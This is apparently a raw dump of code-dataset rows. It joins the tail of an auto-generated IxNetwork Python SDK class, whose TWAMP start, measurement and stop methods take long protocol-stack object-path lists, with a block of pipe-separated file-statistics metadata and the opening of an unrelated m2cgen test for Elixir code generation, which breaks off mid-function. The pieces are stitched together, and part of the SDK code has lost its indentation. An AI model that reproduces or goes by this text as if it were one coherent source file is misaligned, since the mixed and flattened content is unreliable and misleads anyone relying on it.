port/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint
/range/amtRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tpEndpoint,/vport/protocolStack/atm/ip/l2tpEndpoint/range,/vport/protocolStack/atm/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/smDnsEndpoint,/vport/protocolStack/atm/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/atm/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/twampClient,/vport/protocolStack/atm/ip/twampServer,/vport/protocolStack/atm/ipEndpoint,/vport/protocolStack/atm/ipEndpoint/ancp,/vport/protocolStack/atm/ipEndpoint/range/amtRange,/vport/protocolStack/atm/ipEndpoint/range/ancpRange,/vport/protocolStack/atm/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/ipEndpoint/twampClient,/vport/protocolStack/atm/ipEndpoint/twampServer,/vport/protocolStack/atm/pppox,/vport/protocolStack/atm/pppox/ancp,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/ancpRange,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range,/vport/protoco
lStack/atm/pppox/dhcpoPppServerEndpoint/range/ancpRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/pppoxEndpoint,/vport/protocolStack/atm/pppoxEndpoint/ancp,/vport/protocolStack/atm/pppoxEndpoint/range,/vport/protocolStack/atm/pppoxEndpoint/range/ancpRange,/vport/protocolStack/atm/pppoxEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppoxEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet,/vport/protocolStack/ethernet/dcbxEndpoint,/vport/protocolStack/ethernet/dcbxEndpoint/range,/vport/protocolStack/ethernet/dhcpEndpoint,/vport/protocolStack/ethernet/dhcpEndpoint/ancp,/vport/protocolStack/ethernet/dhcpEndpoint/range,/vport/protocolStack/ethernet/dhcpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/dhcpServerEndpoint,/vport/protocolStack/ethernet/dhcpServerEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/ancp,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip,/vport/protocolStack/ethernet/emulatedRouter/ip/ancp,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter
/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhc
poLacEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/twampClient,/vport/protocolStack/et
hernet/emulatedRouter/ip/twampServer,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/ancp,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/twampServer,/vport/protocolStack/ethernet/emulatedRouterEndpoint,/vport/protocolStack/ethernet/emulatedRouterEndpoint/range/amtRange,/vport/protocolStack/ethernet/esmc,/vport/protocolStack/ethernet/fcoeClientEndpoint,/vport/protocolStack/ethernet/fcoeClientEndpoint/range,/vport/protocolStack/ethernet/fcoeClientEndpoint/range,/vport/protocolStack/ethernet/fcoeClientEndpoint/range/fcoeClientFdiscRange,/vport/protocolStack/ethernet/fcoeClientEndpoint/range/fcoeClientFlogiRange,/vport/protocolStack/ethernet/fcoeFwdEndpoint,/vport/protocolStack/ethernet/fcoeFwdEndpoint/range,/vport/protocolStack/ethernet/fcoeFwdEndpoint/secondaryRange,/vport/protocolStack/ethernet/ip,/vport/protocolStack/ethernet/ip/ancp,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/twa
mpControlRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/twa
mpControlRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/twampClient,/vport/protocolStack/ethernet/ip/twampServer,/vport/protocolStack/ethernet/ipEndpoint,/vport/protocolStack/ethernet/ipEndpoint/ancp,/vport/protocolStack/ethernet/ipEndpoint/range/amtRange,/vport/protocolStack/ethernet/ipEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ipEndpoint/twampClient,/vport/protocolStack/ethernet/ipEndpoint/twampServer,/vport/protocolStack/ethernet/pppox,/vport/protocolStack/ethernet/pppox/ancp,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/dhcpv6PdCl
ientRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/pppoxEndpoint,/vport/protocolStack/ethernet/pppoxEndpoint/ancp,/vport/protocolStack/ethernet/pppoxEndpoint/range,/vport/protocolStack/ethernet/pppoxEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppoxEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/pppoxEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/vepaEndpoint,/vport/protocolStack/ethernet/vepaEndpoint/range,/vport/protocolStack/ethernetEndpoint,/vport/protocolStack/ethernetEndpoint/esmc,/vport/protocolStack/fcClientEndpoint,/vport/protocolStack/fcClientEndpoint/range,/vport/protocolStack/fcClientEndpoint/range,/vport/protocolStack/fcClientEndpoint/range/fcClientFdiscRange,/vport/protocolStack/fcClientEndpoint/range/fcClientFlogiRange,/vport/protocolStack/fcFportFwdEndpoint,/vport/protocolStack/fcFportFwdEndpoint/range,/vport/protocolStack/fcFportFwdEndpoint/secondaryRange]
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('stop', payload=payload, response_object=None)
def TwampStart(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the twampStart operation on the server.
Initiate TWAMP control and test sessions for selected ranges and start measurements
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
twampStart(async_operation=bool)
--------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
twampStart(Arg2=enum, async_operation=bool)
-------------------------------------------
- Arg2 (str(async | sync)): kArray[kObjref=/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/twampClient,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/twampClient,/vport/protocolStack/atm/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/ipEndpoint/twampClient,/vport/protocolStack/ethernet/emulatedRouter/i
p/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/twampClient,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/twampClient,/vport/protocolStack/ethernet/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ipEndpoint/twampClient]
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('twampStart', payload=payload, response_object=None)
def TwampStartMeasurement(self, *args, **kwargs):
    # type: (*Any, **Any) -> None
    """Executes the twampStartMeasurement operation on the server.

    Commence active two-way measurement.

    The IxNetwork model allows for multiple method signatures with the same
    name while python does not:

    twampStartMeasurement(async_operation=bool)
    twampStartMeasurement(Arg2=enum, async_operation=bool)

    - Arg2 (str(async | sync)): an array of object references to TWAMP
      control ranges / clients under /vport/protocolStack (atm and ethernet
      stacks, with or without emulatedRouter / l2tp / egtp endpoints).
    - async_operation (bool=False): True to execute the operation
      asynchronously. Any subsequent rest api calls made through the
      Connection class will block until the operation is complete.

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Positional arguments map onto Arg2, Arg3, ... (Arg1 is always self).
    payload = {"Arg1": self}
    for position, value in enumerate(args, start=2):
        payload['Arg%s' % position] = value
    for name, value in kwargs.items():
        payload[name] = value
    return self._execute('twampStartMeasurement', payload=payload, response_object=None)
def TwampStop(self, *args, **kwargs):
    # type: (*Any, **Any) -> None
    """Executes the twampStop operation on the server.

    Teardown TWAMP sessions for selected ranges.

    The IxNetwork model allows for multiple method signatures with the same
    name while python does not:

    twampStop(async_operation=bool)
    twampStop(Arg2=enum, async_operation=bool)

    - Arg2 (str(async | sync)): an array of object references to TWAMP
      control ranges / clients under /vport/protocolStack (atm and ethernet
      stacks, with or without emulatedRouter / l2tp / egtp endpoints).
    - async_operation (bool=False): True to execute the operation
      asynchronously. Any subsequent rest api calls made through the
      Connection class will block until the operation is complete.

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Positional arguments map onto Arg2, Arg3, ... (Arg1 is always self).
    payload = {"Arg1": self}
    for position, value in enumerate(args, start=2):
        payload['Arg%s' % position] = value
    for name, value in kwargs.items():
        payload[name] = value
    return self._execute('twampStop', payload=payload, response_object=None)
| 161.126761
| 23,008
| 0.817408
| 8,365
| 80,080
| 7.803586
| 0.04483
| 0.239073
| 0.17366
| 0.13481
| 0.942598
| 0.933346
| 0.92492
| 0.924384
| 0.919313
| 0.911071
| 0
| 0.00973
| 0.068257
| 80,080
| 496
| 23,009
| 161.451613
| 0.865133
| 0.891521
| 0
| 0.263566
| 0
| 0
| 0.08706
| 0.017323
| 0
| 0
| 0
| 0
| 0
| 1
| 0.255814
| false
| 0
| 0.023256
| 0
| 0.488372
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
a14bf3375632b44e6afebba0a39df245fb43b011
| 21,568
|
py
|
Python
|
tests/interpreters/test_elixir.py
|
lucasavila00/m2cgen
|
4f41ce60cf7f5a6f198d0adc43201f9e5a5aedeb
|
[
"MIT"
] | null | null | null |
tests/interpreters/test_elixir.py
|
lucasavila00/m2cgen
|
4f41ce60cf7f5a6f198d0adc43201f9e5a5aedeb
|
[
"MIT"
] | null | null | null |
tests/interpreters/test_elixir.py
|
lucasavila00/m2cgen
|
4f41ce60cf7f5a6f198d0adc43201f9e5a5aedeb
|
[
"MIT"
] | null | null | null |
from m2cgen import ast
from m2cgen.interpreters import ElixirInterpreter
from tests.utils import assert_code_equal
def test_if_expr():
    """IfExpr lowers to an Elixir cond/1 wrapped in an anonymous fn."""
    expr = ast.IfExpr(
        ast.CompExpr(ast.NumVal(1), ast.FeatureRef(0), ast.CompOpType.EQ),
        ast.NumVal(2),
        ast.NumVal(3))
    # NOTE(review): leading indentation inside the expected-code literals in
    # this copy of the file appears to have been stripped; verify exact
    # whitespace against the upstream repository.
    expected_code = """
defmodule Model do
@compile {:inline, read: 2}
defp read(bin, pos) do
<<_::size(pos)-unit(64)-binary, value::float, _::binary>> = bin
value
end
defp list_to_binary(list) do
for i <- list, into: <<>>, do: <<i::float>>
end
def score(input) do
input = list_to_binary(input)
func0 = fn ->
cond do (1.0) == (read(input,0)) ->
2.0
true ->
3.0
end
end
func0.()
end
end
"""
    interpreter = ElixirInterpreter()
    assert_code_equal(interpreter.interpret(expr), expected_code)


def test_bin_num_expr():
    """Nested BinNumExpr lowers to parenthesized arithmetic over read/2."""
    expr = ast.BinNumExpr(
        ast.BinNumExpr(
